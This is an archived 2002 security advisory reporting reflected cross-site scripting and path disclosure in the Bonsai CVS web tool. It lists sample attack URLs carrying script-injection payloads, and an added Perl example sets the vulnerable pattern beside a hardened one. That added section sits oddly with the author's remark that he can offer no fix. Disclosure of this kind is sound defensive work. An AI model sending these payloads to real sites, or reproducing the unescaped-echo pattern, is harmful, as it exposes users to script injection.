Advisory: Bonsai XSS and Physical Path Revealing Vulnerabilities

From: Stan Bubrouski (stanat_private)
Date: Mon Aug 19 2002 - 16:20:20 PDT


    Author: Stan Bubrouski
    Date: 19 August 2002
    Product: Bonsai
    Versions Affected: All (current release and CVS tip)
    Severity: Cross-site scripting ("CSS" below, meaning
    script injection, not stylesheets) is possible in
    several places because tags are not stripped from
    user-supplied parameters before they are echoed back.
    Some error messages also reflect CSS payloads and
    reveal the physical path of the Bonsai scripts.
    
    Problem:  Cross-site scripting needs no introduction,
    so the following sample URLs demonstrate the problem.
    
    CSS Problems:
    /webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert(document.domain)</script>
    /webtools/bonsai/cvslog.cgi?file=<script>alert(document.domain)</script>
    /webtools/bonsai/cvsblame.cgi?file=/index.html&root=<script>alert(document.domain)</script>
    /webtools/bonsai/cvsblame.cgi?file=<script>alert(document.domain)</script>
    /cvsquery.cgi?branch=<script>alert(document.domain)</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
    /cvsquery.cgi?module=<script>alert(document.domain)</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
    /showcheckins.cgi?person=<script>alert(document.domain)</script>
    /cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert(document.domain)</script>&branch=HEAD
    
    Physical Path Revealing and CSS:
    /bonsai/cvslog.cgi?file=/index.html&rev=<script>alert(document.domain)</script>&root=/cvsroot/
    
    Physical Path Revealing only:
    /bonsai/cvsview2.cgi
    /bonsai/multidiff.cgi
    
    As the list shows, there are many injection points.
    Most are in the error-output subroutines, the rest in
    routines that echo query parameters into the page
    without filtering them.  Something to keep in mind if
    anyone out there is using Bonsai.  The physical paths
    are revealed because Perl error messages (which carry
    the "at /path/to/script.cgi line N" suffix) appear to
    be written straight into the HTML response instead of
    the server error log.
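    The two defects above reduce to one coding pattern in a
    Perl CGI: a parameter (or the text of $@ after a failed
    eval) is interpolated into the HTML output as-is.  The
    script below is an added illustration, not Bonsai code:
    it shows that pattern beside a hardened version that
    HTML-escapes everything echoed to the browser and keeps
    the Perl error text in the server log.  The script path,
    the open_log stand-in, the parameter names and the
    cvsroot value are assumptions made for the example.

```perl
#!/usr/bin/perl -w
# Added example (not Bonsai code): the reflected-XSS and
# path-leak pattern from the advisory next to a hardened
# version. open_log, the parameter names and the cvsroot
# value are assumptions for illustration only.
use strict;

# Minimal HTML escaping for the five characters that matter
# in element content and attribute values. A real script
# can use HTML::Entities::encode_entities instead.
sub html_escape {
    my ($s) = @_;
    $s =~ s/&/&amp;/g;
    $s =~ s/</&lt;/g;
    $s =~ s/>/&gt;/g;
    $s =~ s/"/&quot;/g;
    $s =~ s/'/&#39;/g;
    return $s;
}

# Stand-in for the CVS access that fails on bad input
# (assumed behaviour). die without a trailing newline makes
# Perl append " at <script path> line N." to the message,
# which is where the physical path comes from.
sub open_log {
    my ($root, $file) = @_;
    die "No such file '$file' under $root" unless -e "$root$file";
}

# Vulnerable pattern: the parameter is echoed raw, and the
# error text (payload plus script path) is printed into the
# page.
sub vulnerable_page {
    my ($file, $root) = @_;
    my $html = "<h1>Log for $file</h1>\n";
    eval { open_log($root, $file) };
    $html .= "<p>Error: $@</p>\n" if $@;   # leaks payload and path
    return $html;
}

# Hardened pattern: escape everything that came from the
# request, and send $@ to the error log instead of the
# browser so the path never reaches the response.
sub hardened_page {
    my ($file, $root) = @_;
    my $html = "<h1>Log for " . html_escape($file) . "</h1>\n";
    eval { open_log($root, $file) };
    if ($@) {
        warn "cvslog failure: $@";   # server error log only
        $html .= "<p>Error: could not read the requested log.</p>\n";
    }
    return $html;
}

# Constructed attacker input: the payload used in the
# advisory's sample URLs, as a CGI would receive it.
my $file = '<script>alert(document.domain)</script>';
my $root = '/cvsroot/';

print "Content-type: text/html\n\n";
print "<!-- vulnerable -->\n", vulnerable_page($file, $root);
print "<!-- hardened -->\n",   hardened_page($file, $root);
```

    Run it from a shell and compare the two halves of the
    output: the first contains the raw <script> element twice
    (once in the heading, once inside the error text, followed
    by the script's own filesystem path), the second contains
    only &lt;script&gt; entities and a fixed error sentence.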
    
    Vendor Notification:
    Notification of the vulnerability was sent to the
    Mozilla team on August 5, 2002.  After receiving
    no response on the matter, I sent another
    message on August 7th and I received a brief
    response from someone the same day.  The problem
    still exists on mozilla.org and no changes have
    been made to Bonsai CVS to this very day.  The fix
    seems simple, but I do not have a system to test
    with so I cannot offer any solution.
    
    This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 16:57:44 PDT